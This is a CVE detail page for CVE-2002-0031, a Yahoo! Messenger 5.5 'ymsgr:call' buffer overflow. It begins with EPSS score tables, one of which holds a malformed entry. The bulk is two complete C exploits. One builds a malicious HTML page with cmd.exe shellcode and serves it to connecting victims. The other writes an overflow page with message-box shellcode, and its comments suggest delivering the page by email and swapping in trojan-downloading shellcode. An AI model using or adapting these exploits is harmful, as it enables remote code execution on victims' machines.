CVE-2002-0031 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	6.26%	–	–
2022-04-03	–	–	6.26%	–	–
2022-10-30	–	–	6.26%	–	–
2022-11-20	–	–	6.26%	–	–
2022-12-18	–	–	6.26%	–	–
2023-01-01	–	–	6.26%	–	–
2023-02-26	–	–	6.26%	–	–
2023-03-12	–	–	–	1.58%	–
2023-04-09	–	–	–	1.86%	–
2024-02-11	–	–	–	1.86%	–
2024-06-02	–	–	–	1.86%	–
2024-07-14	–	–	–	1.86%	–
2024-08-04	–	–	–	1.86%	–
2024-08-11	–	–	–	1.86%	–
2024-12-22	–	–	–	9.73%	–
2025-01-19	–	–	–	9.73%	–
2025-03-18	–	–	–	–	21.42%
2025-03-18	–	–	–	–	21.42,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	78%
2022-04-03	9%
2022-10-30	91%
2022-11-20	9%
2022-12-18	91%
2023-01-01	9%
2023-02-26	91%
2023-03-12	85%
2023-04-09	87%
2024-02-11	88%
2024-06-02	88%
2024-07-14	89%
2024-08-04	88%
2024-08-11	89%
2024-12-22	95%
2025-01-19	95%
2025-03-18	95%
2025-03-18	95%

/* * * ---[ Remote yahoo Messenger V5.5 exploiter on Windows XP ]--- * * Dtors Security Research (DSR) * Code by: Rave * * The buffer looks like this * * |-<-<-<--| * <Fillup x offset><JMP 0x3><EIP><NOPS><SHELLCODE> * ^__________^ * * */ #include <windows.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdio.h> /* These are the usual header files */ #include <winsock2.h> #include <stdio.h> #include <stdlib.h> #define MAXDATASIZE 555 /* Max number of bytes of data */ #define BACKLOG 200 /* Number of allowed connections */ static int port =80; /* library entry inside msvcrt.dll to jmp 0xc (EB0C); */ char sraddress[8]="\x16\xd8\xE8\x77"; /* This shellcode just executes cmd.exe nothing special here.. * the victim gets a cmd shell on his desktop :) lol ! \ */ unsigned char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x8d\x45\xf8\x50\xb8" "\x44\x80\xbf\x77" // 0x78bf8044 <- adress of system() "\xff\xd0"; // call system() static int port; void Usage(char *programName) { printf("\n\t\t---------------------------------------------------\n"); printf("\t\t\t\tDtors Security Research (DSR) \n"); printf("\t\t\t\tCode by: Rave\n"); printf("\t\t\t\tMail: rave@dtors.net\n"); printf("\t\t---------------------------------------------------\n\n"); /* Modify here to add your usage message when the program is * called without arguments */ printf("\t\t---------------------------------------------------\n\n"); fprintf(stdout,"\t\t-P local webserver server portnumber\n"); fprintf(stdout,"\t\t-g greatz to:\n\n\n\n\n"); printf("\t\t---------------------------------------------------\n\n"); } /* returns the index of the first argument that is not an option; i.e. does not start with a dash or a slash */ int HandleOptions(int argc,char *argv[]) { int i,firstnonoption=0; for (i=1; i< argc;i++) { if (argv[i][0] == '/' || argv[i][0] == '-') { switch (argv[i][1]) { /* An argument -? means help is requested */ case '?': Usage(argv[0]); break; case 'P': port=atoi(argv[i+1]);break; case 'H': if (!stricmp(argv[i]+1,"help")) { Usage(argv[0]); break; } /* If the option -h means anything else * in your application add code here * Note: this falls through to the default * to print an "unknow option" message */ /* add your option switches here */ default: fprintf(stderr,"unknown option %s\n",argv[i]); break; } } else { firstnonoption = i; break; } } return firstnonoption; } int main(int argc,char *argv[]) { FILE *fptr; unsigned char buffer[5000]; int offset=320; // <-- the offset off the buffer = 320 x NOP; (At 321 whe begin the instruction pointer change) int fd,fd2 ,i,numbytes,sin_size; /* files descriptors */ char sd[MAXDATASIZE]; /* sd will store send text */ struct sockaddr_in server; /* server's address information */ struct sockaddr_in client; /* client's address information */ struct hostent *he; /* pointer for the host entry */ WSADATA wsdata; WSAStartup(0x0101,&wsdata); if (argc == 1) { /* If no arguments we call the Usage routine and exit */ Usage(argv[0]); return 1; } HandleOptions(argc,argv); fprintf(stdout,"Creating index.html: "); if ((fptr =fopen("index.html","w"))==NULL){ fprintf(stderr,"Failed\n"); exit(1); } else { fprintf(stderr,"Done\n"); } // memseting the buffers for preperation memset(sd,0x00,MAXDATASIZE); memset(buffer,0x00,offset+32+strlen(shellcode)); memset(buffer,0x90,offset); // whe place the a jmp ebp+0x3 instuction inside the buffer // to jump over the eip changing bytes at the en offset // // <fillup x offset>jmp 0x3<eip><NOPS><shellcode> // |____________^ buffer[offset-4]=0xeb; buffer[offset-3]=0x03; memcpy(buffer+offset,sraddress,4); memcpy(buffer+offset+4,shellcode,strlen(shellcode)); // here whe make the index.html // whe open it again if some one connects to the exploiting server // and send it over to the victim. fprintf(fptr,"<!DOCTYPE HTML PUBLIC %c-//W3C//DTD HTML 4.0 Transitional//EN%c>",0x22,0x22); fprintf(fptr,"<html>"); fprintf(fptr,"<title>Oohhh my god exploited</title>\n"); fprintf(fptr,"<body bgcolor=%cblack%c>",0x22,0x22); fprintf(fptr,"<body>"); fprintf(fptr,"<font color=%c#C0C0C0%c size=%c2%c face=%cverdana, arial, helvetica, sans-serif%c>", 0x22,0x22,0x22,0x22,0x22,0x22); fprintf(fptr,"<B>Dtors Security Research (DSR)</B>\n"); fprintf(fptr,"<p>Yah000 Messager Version 5.5 exploit....</p>\n"); fprintf(fptr,"<pre>"); fprintf(fptr,"<IFRAME SRC=%cymsgr:call?%s%c>Contach heaven</html></body>\x00\x00\x00",0x22,buffer,0x22); fprintf(fptr,"<IFRAME SRC=%chttp://www.boothill-mc.com/images/skull-modsm_01.gif%c>....</html> </body>\x00\x00\x00",0x22,0x22); fclose(fptr); // <-- closing index.html again // Some extra debuging information fprintf(stdout,"Using port: %d\n",port); fprintf(stdout,"\nStarting server http://localhost:%d: ",port); if ((fd=socket(AF_INET, SOCK_STREAM, 0)) == -1 ){ /* calls socket() */ printf("socket() error\n"); exit(1);} else { fprintf(stderr,"Done\n"); } server.sin_family = AF_INET; server.sin_port = htons(port); server.sin_addr.s_addr = INADDR_ANY; /* INADDR_ANY puts your IP address automatically */ memset(server.sin_zero,0,8); /* zero the rest of the structure*/ if(bind(fd,(struct sockaddr*)&server,sizeof(struct sockaddr))==-1){ /* calls bind() */ printf("bind() error\n"); exit(-1); } if(listen(fd,BACKLOG) == -1){ /* calls listen() */ printf("listen() error\n"); exit(-1); } while(1){ sin_size=sizeof(struct sockaddr_in); if ((fd2 = accept(fd,(struct sockaddr *)&client,&sin_size))==-1){ /* calls accept() */ printf("accept() error\n"); exit(1); } if ((he=gethostbyname(inet_ntoa(client.sin_addr)))==NULL){ printf("gethostbyname() error\n"); exit(-1); } printf("You got a connection from %s (%s)\n", inet_ntoa(client.sin_addr),he->h_name); /* prints client's IP */ fprintf(stdout,"\nOpening index.html for remote user: "); if ((fptr =fopen("index.html","r"))==NULL){ fprintf(stderr,"Failed\n"); exit(1); } else { fprintf(stderr,"Done\n"); } fprintf(stdout,"Sending the overflow string... "); // reading the index.html file and sending its // contents to the connected victim while (!feof(fptr)) { send(fd2,sd,strlen(sd),0); numbytes=fread(sd,sizeof(char),MAXDATASIZE,fptr); sd[numbytes * sizeof(char)]='\0'; } send(fd2,sd,strlen(sd),0); printf("\n\n\nExploit Done....\n\n\n"); printf("A shell is started @ %s :) lol\n\n\nPress any key to exit the exploit",inet_ntoa(client.sin_addr),he->h_name); gets(sd); exit(0); } return 0; } // milw0rm.com [2003-06-23]

// source: https://www.securityfocus.com/bid/4837/info Yahoo! Messenger configures the 'ymsgr:' URI handler when it is installed. The handler invokes YPAGER.EXE with the supplied parameters. YPAGER.EXE accepts the 'call' argument; it is used for starting the 'Call Center' feature. There is a stack overrun condition in the 'Call Center' component that may be exploited through a specially constructed URI. It has been reported that the stack frame of the affected function will be corrupted if the argument to the 'call' parameter passed to YPAGER.EXE is of 268 bytes or greater in length. Attackers may exploit this vulnerability to execute arbitrary code. /* Yahpoo.c by bob@dtors.net [www.dtors.net] [DSR] * * Why Yahoo Messenger have not fixed this vulnerbility * I dont know...but either way they are stupid! * * This exploit has been tested on: * Yahoo Messenger 5,5,0,1246 * Yahoo Module 5,5,0,454 * * For: * Windows 2000 Professional 5.0.2195 SP3 * * Rave@dtors.net has released a windows [exe] version of this * exploit but for Windows XP Pro SP1. * So both targets are vulnerable XP/2k...some addresses might need changing. * * Problems that may occur: * * The addresses used may vary from box to box..so they might need changing. * The stack may keep on changing the location of your shellcode address..you * need to hit a static sector that will not alternate. [this is the reason we jmp] * There exist two crashes...the first one we bypass..this is the access violation * when you hit the nop sled the first time round. The second crash is where we * hit the nop sled...so dont get confused between the 2. * * The shellcode used here...will not do anything malicious..just opens a popup box * You can change this shellcode to something else...but the buffer is not very big * so there is no chance of a bind shell or anything. * Sloth from nopninjas.com has a shellcode that will download a trojan * and execute it. Nice and small as well ;) * * Thats about it...this exploit will lead to remote command execution on the * victim. Bare in mind this is triggered via bad URI handling...and the victim * needs to actually view the evil html file..this can be done automatically via * email >:) * * Big Lovin to rica. * Thanks to rave for his time. * Greetz: * mercy, Redg, opy, phreez, eSDee, ilja, looney, The_itch, angelo, inv, kokanin, * macd, SiRVu|can, Sally, Lucipher, gloomy, phaze, uproot, b0f. * special thanks to sloth@nopninjas * * * bob@dtors.net www.dtors.net */ #include <stdio.h> #include <stdlib.h> #include <string.h> #define MessageBoxA "\x1d\x97\x53\x01" char ret[8]= "\xD5\x96\x7A\x01"; unsigned char win32_msgbox[] = { "\xEB\x19\x5E\x33\xC9\x89\x4E\x05\xB8" MessageBoxA "\x2D\x01\x01" "\x01\x01\x8B\x18\x6A\x10\x56\x56\x51\xFF\xD3\xE8\xE2\xFF\xFF\xFF" "\x62\x6f\x62\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" }; int main(int argc,char *argv[]) { FILE *evil; char *shellcode = win32_msgbox; unsigned char buffer[5000]; int offset=320; fprintf(stdout, "\n\tYahPoo.c By bob.\n"); fprintf(stdout, "Remote Exploit for Yahoo! Messenger 5.5\n"); fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n\n"); fprintf(stdout,"Makin' da EbUL HTML File... "); if ((evil =fopen("yahoo.html","w"))==NULL){ fprintf(stderr,"Failed\n"); exit(1); } else { fprintf(stderr,"Opened!\n"); } memset(buffer,0x00,offset+32+strlen(shellcode)); memset(buffer,0x90,offset); memcpy(buffer+offset,ret,4); memcpy(buffer+offset+4,shellcode,strlen(shellcode)); buffer[264] = 0xD4; //address of &shellcode buffer[265] = 0x96; buffer[266] = 0x7A; buffer[267] = 0x01; buffer[272] = 0xF5; //jmp 0xc [msvcrt.dll] buffer[273] = 0x01; buffer[274] = 0x01; buffer[275] = 0x78; fprintf(evil,"<html>"); fprintf(evil,"<title>Bought to you by dtors.net!</title>\n"); fprintf(evil,"<B>Dtors Security Research (DSR)</B>\n"); fprintf(evil,"<p>Yahoo Messenger 5.5 exploit....</p>\n"); fprintf(evil,"<pre>"); fprintf(evil,"<a href=%cymsgr:call?%s%c>!EbUL Link!</a></body></pre></html>\x00\x00\x00",0x22,buffer,0x22); fclose(evil); // <-- closing yahoo.html fprintf(stdout,"\nDa ebUL HTML file is >>yahoo.html<<\nEnjoy!\nwww.dtors.net\n\n"); } //end main